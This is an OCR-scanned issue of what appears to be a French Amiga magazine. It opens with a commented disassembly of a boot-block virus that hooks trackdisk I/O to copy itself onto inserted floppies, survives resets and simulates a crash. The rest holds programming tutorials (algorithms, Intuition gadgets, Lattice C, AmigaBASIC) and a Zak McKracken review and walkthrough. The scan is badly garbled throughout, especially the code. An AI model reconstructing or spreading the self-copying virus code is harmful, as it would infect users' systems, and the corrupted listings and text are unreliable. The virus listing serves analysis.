0166 42A8 0004 clr.l $ 0004(AO) ,-KICKTAGPTR. (PTR. SUR UNE TABLE RESIDENTE.)
016A 2D48 0226 movc.1 A0,SO226(A6) 016E32BC4AFC move.w $ 4AFC,(Al) ;RT MATCHWORD 0172 2349 0002 move.l A1.S0002(A1) :* RT_MATCHWORD 0176 45E9 001A lea $ 001A(A1),A2 017A 234A0006 move.l A2,S0006(A1) ;RT_ENDSK1P 017E 137C 0001 OOOA movc.b «OI,SOOOA(A1);RT_FLAGS 0184 137C 0021 OOOB move.b $ 21,$ OOOB(A1) ;RT_VERSION 018A 137C 0000 OOOC move.b $ 00,$ OOCC(A1) ;RT_TYPE 0190 137C OOF6000D move.b $ F6,$ OOOD(A1) ;RT_PRI 0196 47E9 0012 lea $ 0012(A1),A3 O19A 234B000E movc.l A3,SOOOE(A1) ;*RT_NAME 019E 237C OOOOOOOO 0012 move.l $ 00000000, S0012(A1) ;*RT_IDSTRING PRT. SUR LE PROG. A EXECUTER LORS DU RESET
SOIT SC338S(PC) 01A6 47FA01EO 01AA234B 0016 OlAE 4EAEFD9C O1B2 2D40 022A 01B6 4E75 lea $ OOOC3388(pc),A3 ;RT_IN1T movc.1 A3,S0016(A1) jsr $ FD9C(A6)-612(K1CKSUMDATA) move.1 D0,$ 022A(A6) iKICKCUECKSUM PARTIE DU PROG. DETOURNEE ET EXECUTEE A CHAQUE UTILISATION DU TRACKDISKDEVICE SOIT SENDIO OU DOIO. A POINTE SUR UN lOJtEQVEST. DONC CHAQUE FOIS QUE VOUS ENTREZ UNE DISQUETTE DANS LE LECTEUR VOUS AUREZ UNE COPIE DU VIRUS SUR CELLE CI.
C31B8 2029 002C move.l $ O02QAl)JDO ;IO_OFSSET C31BC BOBC OOOOOOOO cmp.l $ 00000000330 ;BLOC 0 DE LA DIS- bne S000C32C4 ;SI NON movtb S001D A1)J30 ;IO_COMMANDE cmp.b *503,D0 iCOMMANDE WRITE ?
;S[0U1 QUETTC?
C31C2 6600 0100 C31C6 1029 001D C31CA B03C 0003 C31CB 67000032 C31D2B03C 0002 C31D6 6600 OOEC C31DA 2F08 C31DC 20690018 C31EÛ 1028 0041 C31E4 205P C31E6 130000BFD100 C31EC 1039 OOBFHOOl iCOMMANDE READ 7 ;SI NON beq 5000C3202 cmp.b *S02J» bne SOOOC32C4 move.l A0,-(A7) movel SO018(Al),A0 ;lO_UNIT move.b $ 1»41(AO)PO ;7777T77?
Move.l (A7H.A0 move.b D0.500BFD100 ;CIA B PRB move.b JOOBPEOOI.DO ;CIAAPRA C31P2 0800 0003 No £00834» iPROTECriON EN ECRITURE 7 C31F6 6700 OOCC beq SOOOC32C4 ;SIOUI C31FA 0800 0002 . Bu 500024» ; CHANGEMENT DISQUETTE 7 C31FK 6700 OOC4 beq S000C32C4 ;SI NON C3202 48E7 40FE movcm.l D1 A0-A6. (A7) C3206 2C78 0001 movcj S0004.A6 iEXECBASE C320A 33FC 4000 00DFF09A move.w *S4000,$ COD1T09A .INTENA (INTERDIT 1N 1ER.)
C3212 062E 0001 0126 Mdl.b $ 01.S012«A6) ;IDNBSTCNT 0218 137C 0003 OOID movej, S03,S001D(A1) ; WRITE - IO_COMMANDE C32IE 2669 0028 move.l S0028 A1), A3 ;10_DATA 0222 244B move-1 A3,A2 C3224 0CA9 00000400 0024 cmpi.l SOOOOOdOO,50024(Al ) ;K)_UèNOTH ?
0220 6700 0020 beq SOOOC324K : SI LONGEUR = 1024 OCTETS TRANSFERE LES S121ER OCTETS DV PROG C3230 267A 01AC move..l SOOOC33DE(pc),A3 0234 234B 0028 move I A3 0028(A1) ;PTO. BUFFER-: 10_DATA C3238 237C 00000400 0024 movc.1 $ C0000400.50024(A1):1024- 10JENGT1I C3240 41HAEDBE le* SOOOC30OO(pc).AO iDEBUTPROG.
C3244 43FA FFBA le* SWOC3200(pc ,Al C3248 14D8 move-b (A0 *,(A2 * C324AB3C8 crnp.,1 A0.A1 C324C 66FA boe.i SOOOC3248 ;TRANSFERE DE TOUT LE PROG. DANS [ES 1024 OCTETS DU BUFPF.R ' C324E 244B movej A3.A2 C3250 41FAEDAE le SOOOC3 * C pc).AO DEBUT TOOU.
C3254 43FAOI78 le* S000C33CE(pc).Al ;FINPROG.
C3258 14D8 move.b (A0H.(A2H a25A B3C8 cmp.l A0.A1 C325C 66FA bne.i 5000C3Z58 .CALCUL DU CHECKSUM DU PROG.
C325E 204B movc.l A3.A0 O260 323C00FF move.w 4SOOFPJ3I C3264 4280 cli.t DO 0266 D098 *dd.l (A0)*JX) 0268 6400 0004 bec SOOOC326E O26C 5280 üddq.1 81J30 C326ES1C9FFF6 dbf D1.S000C3266 0272 4680 nof! DO 0274 222B 0004 move.l S0004(A3).D1 0278 D280 *ddj D0.D1 027A 6100 0008 bcc S000C3284 Q27H D2BC 00000001 *dd.l *500000001,D1 0284 2741 0004 movej D1,50004(A3) TEST LE NOMBRE D'OPERATION I O (ENTREE SORTIE) 0288 41FA 0144 le* S000O3CE([ c).A0 C328C 0C30 Iffi cmpi.w SFFFF.(A0) C3290 67000014 beq S000O2A6 ;Sm_US DE S OTERATIONS H) C32940650CC01 *tdi.w WCCOlXAOlAllGMENlENB.D'OPERATION 10 0298 3010
move.w (A0)4» 029A B07C 0006 gmp.w 500064X1 C329E6500C006 bc. S000CE2A6 ;S I MOINS D(i 6 CjtERAlTONS 10 O2A2 30BCFFPP move.w SPFFF,(A0) AUGMENTE LE NB. QUI INDIQUE COMBIEN ILYA DE COPIE DU VIRUS O2A6 41FAFDA0 le S000C3048(pc),A0 Q2AA069000000001 *ddi.l 500000001,(AO) 02B0 042E 00010126 aibi-b S01,50126(A6) 4DNESTCNT C32B6 6C08 bgc.i SOOOC32CD C32B8 33FC C000 00DFFO9A move.w 5COOO.SOODPH)9A ;INTENA (AUTORISE INTER.)
C32CO 4CDF 7F02 movem.l (A7 *.DI A0-A6 RECUPERE ANCIEN PTR. SUR BEGIN 10 C32C4 207A0110 move.l SOOOC33D6(pc}.AO C32C84EDO np (AO) ÏEI CONTINUE NORMALEMENT .-••• PARTIE DV PROG. DETOURNEE ET EXECUTEE A CHAQUE INTERRUTION DU RASTER.
C32CA 4BPA0104 le $ OOOC33DO(pc),AS C32CE 0C55 PPFP cmpi.w SFFFF((AS) C32D266000B26 toc SOOOC32FA :SION APAS FATT3 RESET C32D6 4BPAOOF6 C32DA OC55 PFFF empi-w 5FFFF,(Â C32DE6600001A bne S000C32FA ;SI PAS 6 OIERATIONS K) C32E2 4BFA OOEE le 5000C33D2 pc),AS iAUGMENTE COMPTEUR D’INTER. RASTER C32E6 0695 00000001 *ddi.l 500000001,(A5) C32EC0C95 00005208 cmpü 500005208,(A5) ; 6210007 (7 MINUTES) C32F2 6500 0006 bcc S000C32PA iOUI C32F6 61000008 ba 5000C3300 ;NON RECUPERE ANCIEN PTR. SUR PROG. D'tNTER RASTER C32FA 2A 7 A OCDE move.l SOOOC33DA(pc).A5 C32FE4ED5 np (A5) JfTCONTINUE NORMALEMENT i-
SIMULATION D'UN PLANTAGE. ON EN SORT EN APPUYANT SUCCESSIVEMENT SUR LES TOUCHES ALT(GAUCHE), A(GAUCHE), ESPACE, AfOROHE), A LT( DROITE) C3300 33FC 4000 00DFTO9A movc.w $ 4O00,$ 00DFH)9A ;INTENA (LNTERDIT INTER.)
03308 062E 0001 0126 «ddi.b $ 0l.$ 0126(A6) ;IDNESTCNT C330E 48E7 FKX) movcni .1 DO-D7,-(A7) ;EFPACE DMA BIT PI ANE C3312 33FC0I0000DFF096 move-w $ OlCO,$ O0DFFO96 JOMACON C331A4 BFA 00B6 1cm SOCOC33D2(pc),A5 C331E 4295 drJ (A5) ;HEACE COMFIEUR D1 INTER. RASTER ;PTR. SUR UN TABLEAU DE CODES TOUCHES CLAVIER. ( CODE DES TOUCHES ALT(GAUCHE),A(GAUCHE),ESPACE1A(DROITE),ALT(DROITE)) C3320 4BFA 0088 le» SOOOC33AA(pc)A5 C3324 1039 OOBFEDOl move.b S00BFED01,D0 ;C1AA1CR C332A 0800 0003 blst $ 0003JX) C332E 67F4 bcc, .s $ 00003324 ;LECTVRE DU CLAVIER C3330 1039 00BFHC01 move.b S00BFECD1.DO ;CIA A
SPR(CLAVIER) C3336 0039 0040 OOBFEEOl orü «S4O.S00BFEE01 ;CIA A CRA(SPR EN SORTIE) C333E 4600 u*.b DO C3340 E218 ror.b 1J 0 C3342 323C 0600 move.w $ 0600,D1 03346 33FC 00D1 ODFE0180 move.w $ 00Dl.$ ODFF0180 REGISTRE COIX3ROO C334E 51C9FFF6 dbf D1.SOOOC3346 ; BOUCLE D’ATTENTE C3352 0239 OOBP OOBFEEOl -idi.b $ BF,$ OOBFEE01 ;CÏA A CRA(SPR EN ENTREE) C33SA 121D move.b (A5HJ31 COMPARE TOUCHE ENTREE AU CLAVIER AVEC LE CONTENU DU TABLEAU DE CODE CLAVIER C335CB200 cmp.b D0.D1 C335E 6600 bne.s $ 00003320 ;SI MAUVAISE TOUCHE C3360 OC 15 COI-T onpLb $ I1',(A5) J-TN DU TABLEAU CODE CLAVIER ?
Beq SOOOC336A ;OUI bra-s SOOOC3324 ;NON ON CONTINU .ACTIVER DMA BTTPIANE C336A 33FC 810G00DFF096 move.w $ 8100,$ 00DFFÜ96 ;DMàCON C3372 4CDF OOPF movem.l (A7H.DO-D7 C3376 042E 0001 0126 subi.b $ 01.$ 0126(A6) ;IDNESTCNT C337C 6C08 bge.i $ 00003386 C337E 33FC COOO OODFRJ9A movew $ C000,S0QDFF09A ;INT£NA (AUTORISE INTER.)
C3386 4E75 iu
- .PARTIE DE PROG. EXECUTEE LORS D’UN RESET le* $ 000C33CE(pc),A5
'.(AS) C3364 6700 0004 C3368 60BA Ica $ OOOC33DO(pc),AO movc-w
(A0)J» C3388 41FA0046 C338C 3010 C338E B07C 0002 C3392 6400
0010 C3396 0650 0001 RESET C339A 2C78 0004 C339E 6100 FD4A C33
A2 4E75 cmp.w $ 0002JX) ONFAIT2RESET?
Bcc $ 000C33A4 ;SI PLUS DE 2 RESET
mddi. w 50001.(AO) ;AUGMENTE COMPTEUR DE movc.1 $ 0004. A6 bsr
SO00C30EA ;INDIQUE QU'ILY A PLUS DE 2 RESET C33A4 30BC FFFF
movc.w $ FFFF.(A0) C33A8 6OF0 bra.s SOOOC339A C33AA
64664067 65FF7472 61636B64 69736B2E ¦df geÿtrmckdiik*'
C33BA 64657669 63650064 6F732E6C 69627261
,dcvice.do .l«brm, C33CA 72790000 00000000 00000000
00000000 *ry--------* C33DA 00000000 00000000 00000000
00000000 *-----... C33EA 00000000 00000000 00000000
00000000 *_________ C33FA OOOCOOOO OOOOOAOO 00000000
00000000 '
- De retour d'un congrès sur la pensée Freudienne dans le 68030,
je trouvais dans ma boite aux lettres une lettre d’un certain
Yves Remord, habitant de Jamae (Charcntcs) pays du Cognac et
des MouctPièts ; celui ci demandait : "...je cherche un
algorithme pour calculer simplement les racines carrées. A ce
propos, pourquoi vous A-News, qui avez un visionnaire dans
l’équipe, n’avez pas encore fait une rubrique sur les bases et
théories de la programmation..." Bonne question notais-je,
mais le visionnaire s’cn était allé! Alors c’est ce bon vieux
Chorizo, grand mamamouchi shooté au bifidus actif, dernier
détenteur du flambeau des initiations que même les Bogdanofs
ne voudraient pas (Ed: bon, on va commencer l'article un
jour?), qui s'y colle.
Je vais donc essayer de vous parler d'ASD, c'est à dire d’Algorithmes et Structures de Données.
ASD number one : le retour de la Chetran Sauvage.
El Yeti qui est à coté de moi en train de colorier l'annuaire du Finistère me demande à quoi ça sert l'ASD?
Ben grosso merdo on va avoir des causeries sur les piles, les files, les arbres, les tris, les listes chaînées et tout ce genre de choses, indispensables dès que vous voulez faire un programme digne de ce nom.
Passe-moi le Chatterton, je commence l’introduction Tout d'abord qu'est ce qu'un algorithme?
Formellement, c’est une suite ordonnée d'opérations pour passer de données à un résultat!
Un petit exemple pour détendre l'atmosphère : un algo simple pour calculer les racines carrées (pour les carrés non parfaits il faudra faire un encadrement de la valeur cherchée).
Or donc on a comme données carre dont on cherche la racine carrée, racine qui va contenir la racine cherchée, impair qui est une variable qui va contenir les nombres impairs successifs (1 puis 3, 5. 7, ...) et enfin test qui va contenir la somme des nombres impairs (1 au premier tour de boucle, puis 1+3, puis 1+3+5, 1+3+5+7,...). L’algo : impair := 1; lest:= 1; racine := 1; &itrcr(carrc); J* saisie du nb * tant que tesKcarre faire début impair := impair + 2; * nb impair suivant * test := test + impair, I* somme des imp suiv* racine := racine + 1 ; fin; Ecrirc(racine); * affeher résultat
* Exemple, je cherche la racine de 16 : 1er tour de boucle : test=l carre=16 donc impair=3, test=4, racme=2 2eme tour de boucle : tcst=4 carre=16 donc impair=5, test=9, racine=3 3eme tour de boucle : toj=9 cane= 16 donc impair-7. Test= 16, raâne=4 4cme tour de boucle : tcst=16 n’est plus caric=16 donc on sort de la boucle et on affiche le résultat racine = 4; on a bien racine de 16 = d. Bon, c'est un exemple avec un petit nombre, et en plus c’est un algo simple donc pas vraiment efficace, on en verra des hachements plus mieux.
Vous avez vu que l'algo est écrit dans un langage bizarre. C'est du Pascal Libre qui est par convention le langage d'écriture d’algorithmes. Don't wony, ça ne va pas vous faire un langage de plus à ingurgiter; certes le pascal libre provient directement du pascal, mais d'une part il est en français donc facilement lisible et compréhensible, d’autre part on utilisera presque toujours des axiomes simples pour décrire l’algorithme, on sera donc très près d’un langage tel que le C. El puis A- News c'est comme les recettes légères de Marie, c'est pas parce que le journal il est tout prêt (quoique
des fois! !!) Que vous n'avez rien à faire.
Ce que vous devez savoir du Pascal Libre :
- à la différence du beri beri, le pascal libre n'est pas une
maladie
- nous avons des constantes : ce sont des nombres ou des
caractères (yagut:=69;assis:="bonanga";)
- il y a aussi des variables définies par leur nom, leur type et
leur valeur
- un type est un ensemble de valeurs possibles pour la variable
(entier, réel, caractère)
- un variable peut être indicée, ce sera alors un tableau : à une
dimension on aura un vecteur (V[i)), à deux dimensions on aura
une matrice (M[i][j] (une matrice (ben ouais y'en a qui savent
pas ce que c’est) c'est comme à la bataille navale, c’est un
tableau repéré par des lignes et des colonnes, A2 coulé (ligne
A, colonne 2)))
- une expression arithmétique est tout simplement un calcul du
style (A+3)*B
- une expression booléenne c'est rien qu’avec des Vrai et des
Faux du genre (A ou B) (A est vrai ou B est vrai), (A et B) (A
est vrai et B est vrai), (A ou (B=C)) (A est vrai ou B est égal
à C)
- l’affectation est notée := ( Blurb:=666; par exemple ou positif
:= (A =0) qui signifie que la variable booléenne positif sera à
vrai si A est supérieur à 0, à faux sinon)
- une instruction est une instruction (L1RE(X); ECRIRE(X);
fonctions de lecture et d'écriture de la variable X) ALGO QUOI
? : 1ère Partie (Chorizo nous parle ASP - Algorithmes et
Structures de Données)
- les structures de contrôle : il y en a de trois types ? Si
alors sinon : c'est la boucle classique de tous les langages
avec la syntaxe si P alors S1 sinon S2 , où P est un prédicat,
et SI et S2 des suites d’instructions.
? Boucle tant que P faire S : le test de sortie de la boucle est ici en tête.
Exemple : division entière de x par y par soustractions successives; début q:=0 r:=x tant que r =y faire début r:=r-y q:=q+l fin fin Voilà. Le résultat sera à la fin dans
q. le reste de la division dans r. Essayez en faisant tourner à
la main.
Les debut-fin délimitent des blocs (équivalents aux (...) enC).
Un cas particulier de la boucle tant que est la boucle pour.
I:=l tant que i =N faire début S 1:=1+1 fin s’écrira plus simplement pour 1=1 a N faire S ? Boucle repeler S jusqu'a P : dans cette boucle le test de sortie est à la fin, donc la suite d’instructions S sera exécutée au moins une fois.
Exemple : la multiplication de x par y (le résultat est dans z); z:=0 u:=y repeter z:=z+x u:=u-l jusqu'a u=0 Là aussi c'est mulet, mais c’est des exemples de base.
Voilà donc ce que l’on pouvait dire sur le Pascal Libre. On va d’ailleurs s’arrêter là poux la première. La prochaine fois on fera risette essentiellement avec les tableaux, donc il y aura plus d'exemples, plus d’action, plus de cascades, plus de sexe
- Chorizo Kid aime la programmation récursive terminale et le
Hard Rock.
INTUITION ET LES GADGETS : EPILOGUE Exclusion mutuelle Dans A-News n’8 (premier article sur les gadgets), nous avions détaillé la structure Gadget. Nous avions laissé de côté le champ MutualExclude. Ce champ n’est pas géré par les versions actuelles d’intuition. C’est dommage car nous aurions bien aimé pouvoir réaliser des effets d’exclusion mutuelle dans nos panneaux de gadgets, n’est-ce pas Yéti?
L’exclusion mutuelle permet d’avoir plusieurs gadgets pour concrétiser un choix; un seul d'entre eux peut être activé à un moment donné. En d’autres termes, le choix de l’un de ces gadgets exclue tous les autres.
Principe que je vous ai énoncé, vous risquez fort d'avoir de drôles de résultats (j’ai teste pour vous et je peux vous assurer que cette fonction est aussi boguée que les bètiscs sont de Cambrai).
Cependant, on peut obtenir de bons résultats si l’on prend certaines précautions. C’est cc que vous pouvez voir dans le programme MutExGadg, en téléchargement sur 3615 DEEP.
Le listing étant trop long (tout du moins pour être reproduit dans Anews), je vous laisse le consulter sur DEEP si le sujet vous interesse. Vous pouvez aussi m’y laisser des questions ou des remarques dans la BAL Batchman.
Maintenant, vous connaissez toutes les finesses de la programmation des gadgets booléens. Les autres types de gadgets appliquant les mêmes principes, je n'exposerai pas ici leur fonctionnement.
Le mois prochain, nous reprendrons l'initiation au C puisque vous êtes nombreux à nous le réclamer.
BATCHMAN Le champ MutualExclude n’étant pas pris en compte, si l’on veut réaliser cet effet, il est nécessaire de le gérer soi-même par l’intermédiaire de la fonction RcfrcshGadgcts.
'B&1C 2 E COM'PILm'IOVtSOUS LWFTICE Cette fonction permet de rendre l’apparence du gadget conforme aux champs de sa structure. En effet, quand vous changer, un des paramètres d’un gadget, sa représentation n’est évide- ment pas modifiée immédiatement et il faut donc demander à Intuition de prendre en compte ces changements. La fonction RefreshGadgets le fait en parcourant la liste des gadgets.
Ici, le problème de l’exclusion mutuelle revient bien entendu, quand un gadget est sélectionné, à éteindre ceux qu’il exclue. Voici le principe: il faut retirer le drapeau SELECTED des flags de tous ces gadgets et appeler RefreshGadgets. Elle va parcourir toute la liste et redessiner en position éteinte ceux qui doivent l’être.
C’est un exemple d'utilisation de cette fonction. Il y en a d’autres mais je ne rentrerai pas plus dans les détails car elle n’est pas facile d’emploi. Si vous l’utilisez en applicant simplement le Il arrivera sûrement un moment où vous aurez à faire de la compilation séparée, ne serait-ce que pour lier deux fichiers objet par.exepiple. Et là, fini le paresseux 'le -L toto.c'. Il faut faire à la suite Ici toto.c lc2 toto.q blink lib:c.o,titi.o,toto.o to toto lib ... Le problème peut être en partie résolu par la commande ’lmlc' (c’est-à- dire make) du Lattice 5.0. Mais il faut l’avoir, et
avoir une horloge.
Je vous propose donc une solution alternative, accessible à tous, permettant de mettre dans le source ces directives de compilation et de façon à cc que le CLI et le compilateur ne se marchent pas sur les pieds.
Supposons donc que vous ayez deux sources toto.c et titi.c, et que vous deviez les lier. Il suffit de commencer toto.c par les lignes suivantes: ; * le titi.c le -j73 toto.c blink lib:c.o,titi.o,toto.o to toto lib lib:lc.lib,lib:amiga.Ub quit * Il ne reste plus alors qu’à exécuter (EXECUTE, que je vous conseille de renommer DO, par exemple) ce source, comme si c’était un script genre startup- sequence. La méthode est simple: le est le signe de commentaire pour le CLI.
Donc il va ignorer le * qui suit, exécuter les lignes après, et ignorer tout ce qu’il y a derrière le QUIT. En revanche, le compilateur risque de ne pas apprécier le ’;’ de la 1ère ligne (il envoie un WARN1NG, cc qui n’est pas grave).
D’où l’option -j73 du 'le'.
Ce truc marche sur les versions 4.0 et au-delà. En revanche, je n’ai plus la version 3.0 du lattice. Mais elle marche peut-être également.
Cédric Beustt A-News o AMIGABASIC - PROGRAMMATION DES LIBRARIES SYSTEM Suite à vos demandes insistantes, j’abandonne mes habituels délires pour ouvrir dès ce mois un dossier sur l’accès aux fonctions des libraries en BASIC. La première des libraries étudiées sera: INTUITION. Sans vous en rendre compte peut-être, vous l’utilisez chaque jour en ouvrant écrans, fenêtres, en utilisant les gadgets, Préférences, et même le gourou!
Comme vous le savez sans doute, il existe en BASIC deux instructions fort intéressantes pour ouvrir les écrans et les fenêtres. Hélas, bon nombre de paramétres leurs sont inaccessibles. Par exemple, comment ouvrir un écran HAM en BASIC, comment faire disparaitre le bord de la fenêtre ? Réponse : INTUITION bien-sûr !
La bibliothèque INTUITION contient deux routines que nous allons voir dans ce numéro : OpenScreen et OpenWindow.
Tout d'abord, j’allais oublier, pour ouvrir la bibliothèque INTUITION tapez : LiDRARY "intuition library" Les deux commandes citées plus haut doivent être déclarées comme fonction, c’est à dire qu'elles renverront une valeur lors de leur appel sous la forme : valeur=instruction(paramètres). Pour déclarer une routine comme fonction, on utilise tout bêtement l’instruction DECLARE FUNCTION nomJe_routine& L DRARY. Dans le cas des commandes OpenScreen et OpenWindow, celles-ci renverront le pointeur sur la structure de la fenêtre ou de l’écran.
Venons en enfin aux paramètres : ces deux instructions attendent comme unique valeur l’adresse de début de la structure contenant les caractéristiques de la fenêtre ou de l’écran à ouvrir. Nous allons maintenant étudier en détail ces structures. Elles devront hélas être mises en place grâce à un POKEagc acharné mais enfin ... Sachez aussi que pour décrire la structure, j’utiliserai les mots COURT et LONG pour désigner si l’élément est codé sur 2 ou 4 octets.
Lut structure NewScreen pour ouvrir un écran: COURT BordGauche,BordHaut,Largeur,Hauieur,Profondeur COURT Couleur_écrimre,Couleur_bloc .Mode,Type LONG Pointeur_font,Pointcur_titrc,Pointcur_Gadget,Bitmap BordGauche et BordHaut correspondent aux coordonnées du coin supérieur gauche de l'écran. La profondeur est le nombre de bitplanes, nbitplancsA2=ncoulcurs.
Le mode est à choisir parmi les suivants par additions:
- DUALPLAYFIELD : &H400, si vous désirez disposer de playfields,
- HIRES : &H8000. Si vous désirez la haute résolution,
- INTERLACE : &H4, pour un affichage entrelacé.
- HAM : &II800. Pour le mode HOLD’N’MODIFY,
- SPRITES : &H4000, pour utiliser des sprites,
- EXTRA_HALFBRIGHT : &H80, si vous voulez le mode HALFBRITE.
Le type sera le plus souvent CUSTOMSCREEN : &HF, quand à tous les pointeurs, ils ne nous intéressent pas pour l’instant, fixez les S La structure NewWindow, pour les fenêtres : COURT BordGauche,BordHaut,Largeur,Hauteur COURT Coulcur_écrilurc,Coulcur bloc LONG IDCMP,Flags,Pointeur_gadget,Pointeur_image,Pointcur_titrc LONG Pointeur_écran,Bitmap COURT LargeurMin,HautcurMin,LargcurMax,HautcurMax COURT Type Les deux premières lignes sont semblables à la structure NewScreen. Le flag IDCMP n’intéresse absolument pas le programmeur BASIC, donc passons. Flags contient les caractéristiques de la
fenêtre, encore un fois par addition:
- WINDOWSFZING : &H1, pour modifier la taille,
- WINDOWDRAG : &H2 pour déplacer la fenêtre,
- WINDOWDEPTH : &H4 pour le gadget avant arrière,
- WINDOWCLOSE : &H8 pour la fermeture,
- BACKDROP : &H100 pour que votre fenêtre soit derrière toutes
les autres,
- GIMMEZEROZERO : &H400 pour séparer les gadgets de la surface
graphique,
- BORDERLESS : &H800 pour éliminer les bords de la fenêtre.
Cette liste est incomplète faute de place ... Encore une fois fixez tous les pointeurs à 0 (sauf Screen mais nous ai parlerons à la fin), les derniers paramètres parlent d’eux mêmes ! Enfin Type, encore une fois CUSTOMSCREEN : &HF Maintenant toute cette belle théorie mise en place, comment agir en pratique me direz-vous ? Nous y venons ... Tout d’abord il faut réserver de la mémoire pour stocker les paramètres cités plus haut. On utilisera ici la méthode des tableaux de type entier. Comptez 1 pour chaque élément COURT, 2 pour les éléments longs, faites Ta somme et vous obtenez 32 pour l’écran
et 48 pour la fenêtre. Ajoutez 2 comme sécurité et reservez votre mémoire comme suit : DIM Sc % (34), Wi % (50).
Pour obtenir l’adresse de base de ces tableaux utilisez : Sc&- VA RPTR(Sc % (0)): Wi&=VAR PTR(VVi % (0)). Avant d’initialiser, videz la mémoire avec une simple boucle aui fixe les éléments de ces deux tableaux à 0. Ok présent il faut remplir cette mémoire par les éléments de la structure correspondante. On utilisera POKEW pour les élément COURT et POKEL pour les LONG.
Le premier élément est POKé à l’adresse Sc& (ou Wi&) puis on incrémente l’adresse de 2 si l’élément précédent est COURT, de 4 s’il est LONG. Exemple POKEW Sc&,0 pour BordGauche, POKEW Sc&-t-4,320 pour Largeur, POKEL Sc&+18,0 pour le Pointeur_font. Compris ?
Maintenant que vos structures sont en mémoire, il ne vous reste plus qu’a appela les routines comme suit: PtScreen&=OpenScreen&(Sc&) PtWindow&=OpenWindow&(Wi&) Les instructions raivoient les pointeurs des écrans et fenêtres. Le pointeur_écran de la structure NewWindow est PtScreen&. Ok ?
Surtout n’oubliez pas de les fermer en appelant: CALL Close Window(Wi&) CALL Close Screen(Sc&) Attention ! L’article ne suit pas l’ordre chronologique : il faut d’abord réserver la mémoire puis ouvrir la librarie et déclara les routines, ensuite POKEr la structure NewScreen, ouvrir l’écran, POKEr la structure NewWindow, ouvrir la fenêtre et referma le tout.
On va s’arrêta là ce mois-ci ! Le mois prochain vous aurez droit à encore plus d’informations sur les écrans et fenêtres ... Sec you !
Contactez moi sur 36 15 DEEP BAL WORKBINCH.
WITH WORKBINCH YOUBASICQUE... CIAOA + Ordinairement les jeux d'aventures et moi, on est fâché! Il y a 2 raisons à ça: d'abord, les 3 4 sont en anglais et il faut chercher le mot qui va bien pendant 3 heures dans le Hanap's (modcl universitaire de préférence..), et la 2ème raison, c'est qu'à part la série des Sierra on Line, très peu sont entièrement animés. Diriger un personnage avec son joystick et lui faire faire ce que l'on veut, c’est quand même autre chose que d'assister bêtement à un slide-show d'images plus ou moin bien dessinées. Que les pauvres aventuriers qui, tout comme moi, ont
renoncé aux jeux aventures pour ces diverses raisons se réjouissent car, avec ZAC MC KRACKEN, ils vont enfin pouvoir sc plonger dans une super aventure complètement dingue.... Premier point fort du jeu: TOUTES les instructions, messages et vocabulaire sont directement accessibles à l'écran, et en FRANÇAIS!. Si vous voulez exécuter une commande ou manipuler des objets, un p'til coup de souris, on clique, et hop, roulez jeunesse. Rien à taper et comprendre les jeux de mots barbares et grassouillets du jeu. Voilà qui change beaucoup de choses!!!. Autre point très intéressant du jeu: les
graphismes en 3D animés. Certes, ils ne sont pas extrordinaircs (un peu plus fin que Sierra on line quand même) mais ils ont l'avantage d'être précis et dans presque tous les tableaux, il y a quelque chose à faire. Mais tout ça ne serait rien, si il n’y avait pas un bon scénario derrière.
Et là, on est gâté: complètement loufoque le juc. Vous êtes un journaliste sous payé et qui ne veut plus écrire des articles sans intérêt dans un petit journal. Mais avant de partir, votre patron vous charge d’une dernière mission: deux campeurs sc sorti fait attaquer par un écureuil à 2 têtes, et vous devez aller voir ça de plus près. Et comme si cela ne suffisait pas, vous devrez aussi enquêter sur une soucoupe volant qui aurait attérri dans les environs il y a 50 ans! Bien drôle d'affaire que voici.... Je ne vous raconterai pas la suite de l’histoire, car je préfère vous laisser le plaisir
de la découvrir. Sachez cependant, que vous n'allez pas vous ennuyer une seule seconde! Outre l'écureuil à 2 têtes, vous devrez donc déjouer les plans d'extra-teiTestrcs complètement à la masse, et qui veulent faire de la terre, une planète débile! Vous comprendrez donc pourquoi tout le jeu repose sur l'humour et les situations insolites. Pour vous aider dans celte enquête, vous ferez connaissance avec 3 autres personnes qui sont sur l'affaire, et qui veulent vous aider. Vous devrez donc diriger non pas 1, mais 4 personnages.
Heureusement, pas de problème pour ça: on passe lits facilement d’un per sonnage à l'auue, et on peut leur laire latre n'.m- porte quoi y compris aller aux toilettes ou tenter de se suicider...D'autres personnes vous seront bien utiles, et pour les rencontrer, vous devrez beaucoup voyager. N'hésitez pas à prendre l'avion pour voir le gourou à Katmandou ou aller au Caire faire une petite visite du côté du Sphinx ou voir les danses rituelles d’une tribu au Zaïre... Devant tant de convivialité, d'humour et d'originalité, je ne peux qu’adresser un grand bravo à LUCASFILM et aussi, à l'équipe de
la S.F.M.l (l’importateur exclusif) et US GOLD pour avoir eu l’intelligence de faire traduire le jeu. ET vous savez quoi? Il parait que le 11 est en préparation.... Zac Me Thierry r (and liie article Mindbenders) L’avis de Cédric : La gestion du personnage pourrait faire penser à celle des King’s QuesL on déplace Zak à la souris et on le fait agir en cliquant sur les différentes actions situées au bas de l’écran: Il y a, au cours du jeu, la réelle impression d’assister à un film.
Tantôt Zak s’interrompt et vous donne la une qu’il proposerait pour une action spectaculaire qu'il vient de faire (c'est son boulot, après tout), tantôt vous êtes carrément interrompu ("Meanwhile, in a secret room...’’) et vous assistez à un entretien entre deux extra-terrestres.
Personnellement, je n’ai jamais autant ri en jouant à un jeu. Dernière innovation: à partir d'un certain moment, vous serez en mesure d’incarner quatre personnages différents. Il faudra soigneusement coordonner leur action si vous voulez arriver au bout de votre quête.
Petit détail: c'est un jeu d'aventures beaucoup plus difficile qu’il n'y parait. Dépaysement garanti pendant de longues heures.
Cédric BEVST Avant de commencer, je tiens à remercier LDFA et ZORGAN qui sévissent sur DEEP, pour m'avoir envoyé la solution de ce fantastique jeu d’aventure. Sans eux, je n'en serais peut- être pas là... Si comme eux, vous désirez nous faire part des bidouilles trucs et astuces en tout genre, un seul zeste: 3615 DEEP, bal ANEWS.
SOFT DU MOIS ZAC Me KRACKEN La solution que nous vous proposons, est un des moyens les plus rapides pour finir le jeu. Si vous la suivez à la lettre vous arriverez au bout sans problème, mais vous passerez à côté d’une multitude de situations et de gags qui font tout le charme du jeu. Je vous conseillerais donc de vous en servir que VRAIMENT si vous êtes bloqués.
Bon et maintenant, on commence.
- SAN FRANCISCO - Prendre le BOCAL A SUSHI. Prendre la FACTURE
DE TELEPHONE dans le tiroir de la commode. Prendre le KAZOO
dans le tiroir du bureau. Prendre le bout de PAPIER sur le
mur (ce qui donne un bout de PAPIER DECHIRE).
Sortir de la pièce et aller dans la cuisine.
Prendre le COUTEAU A BEURRE.
